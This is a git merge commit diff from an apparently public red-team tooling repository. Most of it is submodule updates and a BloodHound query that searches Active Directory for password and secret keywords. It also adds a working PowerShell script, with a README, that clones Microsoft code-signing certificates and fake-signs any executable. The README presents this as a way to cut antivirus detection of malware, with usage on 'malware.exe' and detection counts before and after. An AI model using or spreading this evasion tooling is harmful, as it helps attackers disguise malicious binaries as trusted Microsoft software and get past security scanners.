Merge branch 'master' of github.com:mgeeky/Penetration-Testing-Tools

2022-08-10 02:36:07 +02:00 · 2022-08-10 02:36:07 +02:00 · ba09824453
parent 3bdd7b155a 0fad992452
commit ba09824453
19 changed files with 136 additions and 13 deletions
--- a/clouds/azure/AzureRT
+++ b/clouds/azure/AzureRT
@ -1 +1 @@
-Subproject commit 9aa8a2a623077cae13922ba8a9cabe1d17bc5a5c
+Subproject commit 0c945011fb341f2d5e66a169c2b4b6760592d5b4
--- a/file-formats/PackMyPayload
+++ b/file-formats/PackMyPayload
@ -1 +1 @@
-Subproject commit 75f6270d0417d749b56c718d0d8ad0003c74d785
+Subproject commit c887a6501b08670a9585b50938e93ea20470e88c
--- a/phishing/decode-spam-headers
+++ b/phishing/decode-spam-headers
@ -1 +1 @@
-Subproject commit 56f3289d8cd34883a95a0cf3e639dac1a82ce6f2
+Subproject commit 878f19a4a342f734da9cc9ca6af1b26a3160cc04
--- a/red-teaming/ElusiveMice
+++ b/red-teaming/ElusiveMice
@ -1 +1 @@
-Subproject commit b18def7a662f9f3ba9b3b1dc9b54658c63d4952e
+Subproject commit b5ceae633a9b1995e38dee2192d893bb487ef550
--- a/red-teaming/RedWarden
+++ b/red-teaming/RedWarden
@ -1 +1 @@
-Subproject commit 1ce441eb14cb5e639036a4833b0445f986e12601
+Subproject commit 81d148956541453179216b6f708c69b28891a48e
--- a/Threat/MSKernel32Leaf.cer
+++ b/Threat/MSKernel32Leaf.cer
--- a/Threat/MSKernel32PCA.cer
+++ b/Threat/MSKernel32PCA.cer
--- a/Threat/MSKernel32Root.cer
+++ b/Threat/MSKernel32Root.cer
--- a/red-teaming/Self-Signed
+++ b/red-teaming/Self-Signed
@ -0,0 +1,25 @@
+## Code Signing Certificate Cloning Attack 
+
+A Powershell script that signs input Executable file with fake Microsoft code-signing certificate to demonstrate risks of cloned-certificate sign attacks.
+
+Script was shamelessly borrowed from [Matt Graeber, @mattifestation](https://twitter.com/mattifestation) and his research titled:
+- [_Code Signing Certificate Cloning Attacks and Defenses_](https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec) 
+
+**All credits go to Matt** - this directory contains a copy of his code (_a little tweaked by me_) for preserverance purposes.
+
+
+### Effectiveness
+
+As of [13/07/2022](https://twitter.com/mariuszbit/status/1547320418821980160) this **dumb trick** still gets off the shelf malware evade detection of at least 8 modern security scanners.
+
+| What                                                                         | Result    |
+|------------------------------------------------------------------------------|-----------|
+| Mythic Apollo.exe before fake-signing                                        | [30/70](https://www.virustotal.com/gui/file/1413de7cee2c7c161f814fe93256968450b4e99ae65f0b5e7c2e76128526cc73?nocache=1) |
+| Mythic Apollo.exe after fake-signing with Microsoft code-signing certificate | [22/70](https://www.virustotal.com/gui/file/34543de8a6b24c98ea526d8f2ae5f1dbe99d64386d8a8f46ddbcdcebaac3df65?nocache=1) |
+
+### Usage
+
+```
+PS C:\> . .\Sign-Artifact.ps1
+PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile nomalware.exe -Verbose
+```
--- a/Threat/Sign-Artifact.ps1
+++ b/Threat/Sign-Artifact.ps1
@ -0,0 +1,98 @@
+Function Sign-Artifact {
+    <#
+    .SYNOPSIS
+        Signs input executable file with a faked Microsoft code signing certificate.
+
+    .DESCRIPTION
+        This script uses built-into Windows interfaces to import a fake Microsoft code-signing certificate
+        and use it to sign input executable artifact. Result will be signed, although not verifiable executable.
+
+        Based on Matt Graeber's implementation:
+            https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+
+    .EXAMPLE
+        PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile microsoft.exe
+    #>
+
+    [CmdletBinding()]
+    param(
+        [Parameter(Mandatory=$True)]
+        [string]
+        $InputFile,
+
+        [Parameter(Mandatory=$True)]
+        [string]
+        $OutputFile,
+
+        [switch]
+        $Quiet
+    )
+
+    $Verbose = $PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent
+
+    if (-not(Test-Path $InputFile))
+    {
+        Write-Error "[!] Input file does not exist! FilePath: $InputFile"
+        exit 1
+    }
+
+    if(Test-Path $OutputFile)
+    {
+        Remove-Item -Force $OutputFile
+    }
+
+    #
+    # Based on:
+    #    
+    #
+
+    # We'll just store the cloned certificates in current user "Personal" store for now.
+    $CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
+
+    $MS_Root_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "\MSKernel32Root.cer")
+    $Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation
+
+    $MS_PCA_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32PCA.cer")
+    $Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation
+
+    $MS_Leaf_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Leaf.cer")
+    $Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation
+
+
+    # Validate that that $OutputFile is not signed.
+    if($Verbose) 
+    {
+        Write-Host "`n================================================================================================`n[.] Before signing: `n"
+        Get-AuthenticodeSignature -FilePath $InputFile
+    }
+
+    Copy-Item -Force $InputFile $OutputFile | Out-Null
+
+
+    # Sign $OutputFile with the cloned Microsoft leaf certificate.
+    Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath $OutputFile | Out-Null
+
+    # The certificate will not properly validate because the root certificate is not trusted.
+
+    # View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError"
+    # "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider"
+
+    if($Verbose) 
+    {
+        Write-Host "`n================================================================================================`n[+] After signing: `n"
+        Get-AuthenticodeSignature -FilePath $OutputFile
+    }
+       
+    if(-not $Quiet -or $Verbose)
+    {
+        Get-AuthenticodeSignature -FilePath $OutputFile | Format-List *
+    }
+
+    # Save the root certificate to disk and import it into the current user root store.
+    # Upon doing this, the $OutputFile signature will validate properly.
+    # Export-Certificate -Type CERT -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -Cert $Cloned_MS_Root_Cert
+    # Import-Certificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -CertStoreLocation Cert:\CurrentUser\Root\
+    # 
+    # # You may need to start a new PowerShell process for the valid signature to take effect.
+    # Get-AuthenticodeSignature -FilePath $FilePath
+}
--- a/red-teaming/Self-Signed
+++ b/red-teaming/Self-Signed
--- a/red-teaming/Self-Signed
+++ b/red-teaming/Self-Signed
--- a/red-teaming/SharpWebServer
+++ b/red-teaming/SharpWebServer
@ -1 +1 @@
-Subproject commit d93487d8055668ee9e4b8b12d550a9cf1db7cdc4
+Subproject commit fe849f7f3df48c38b2d3abfb0578799c75fb98c9
--- a/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md
+++ b/red-teaming/bloodhound/Handy-BloodHound-Cypher-Queries.md
@ -400,7 +400,7 @@ MATCH (o:OU)-[:Contains]->(c) RETURN o.name,o.guid, COUNT(c) ORDER BY COUNT(c) D

 - Retrieves nodes having particular juicy keywords in their name or description properties:
 ```
-UNWIND ["admin", "amministratore", "contrase", "empfidlich", "geheim", "hasło", "important", "azure", "MSOL", "Kennwort", "parol", "parola", "pass", "passe", "secret", "secreto", "segreto", "sekret", "sensibil", "sensibile", "sensible", "sensitive", "wrażliw"] AS word MATCH (n) WHERE (toLower(n.name) CONTAINS toLower(word)) OR (toLower(n.description) CONTAINS toLower(word)) RETURN word, n.name, n.description ORDER BY n.name
+UNWIND ["admin", "amministratore", "contrase", "empfindlich", "geheim", "hasło", "important", "azure", "MSOL", "Kennwort", "parol", "parola", "pass", "passe", "secret", "secreto", "segreto", "sekret", "sensibil", "sensibile", "sensible", "sensitive", "wrażliw"] AS word MATCH (n) WHERE (toLower(n.name) CONTAINS toLower(word)) OR (toLower(n.description) CONTAINS toLower(word)) RETURN word, n.name, n.description ORDER BY n.name
 ```

 - Retrieves nodes that contain UNC paths to SMB shares in their description fields:
@ -480,4 +480,4 @@ DOMAIN USERS@WINDOMAIN.LOCAL - AdminTo -> SECWWKS1000000.WINDOMAIN.LOCAL - Gener

 - Hausec - https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
 - Jeffmcjunkin - https://gist.github.com/jeffmcjunkin/7b4a67bb7dd0cfbfbd83768f3aa6eb12
- seajaysec - https://gist.github.com/seajaysec/c7f0995b5a6a2d30515accde8513f77d 
+- seajaysec - https://gist.github.com/seajaysec/c7f0995b5a6a2d30515accde8513f77d 
--- a/red-teaming/cobalt-arsenal
+++ b/red-teaming/cobalt-arsenal
@ -1 +1 @@
-Subproject commit f31499e175e18d04b091bd7f407392378231f4e6
+Subproject commit 41836eeb02d1be01222fdd5020d284ea9fec7b3a
--- a/web/tomcatWarDeployer
+++ b/web/tomcatWarDeployer
@ -1 +1 @@
-Subproject commit fc3ac281bc3f79963c8e0e07015f63c164c32b06
+Subproject commit 79fcd49a329b243c80da832192c30d500c68bf8e
--- a/windows/ShellcodeFluctuation
+++ b/windows/ShellcodeFluctuation
@ -1 +1 @@
-Subproject commit cb7a803493b9ce9fb5a5a3bc1c77773a60194ca4
+Subproject commit 424c6d09608821b761f90d0eb4aaa794f79b480a
--- a/windows/ThreadStackSpoofer
+++ b/windows/ThreadStackSpoofer
@ -1 +1 @@
-Subproject commit fce3a52d15becf671b52b6f9309ccccdc8aeb2ec
+Subproject commit f67caea38a7acdb526eae3aac7c451a08edef6a9
--- a/windows/UnhookMe
+++ b/windows/UnhookMe
@ -1 +1 @@
-Subproject commit 414446b226dc963f651988ab6c1aece8e17d4980
+Subproject commit ff8dc75967381e6bdfb6820cca564ee5250cce58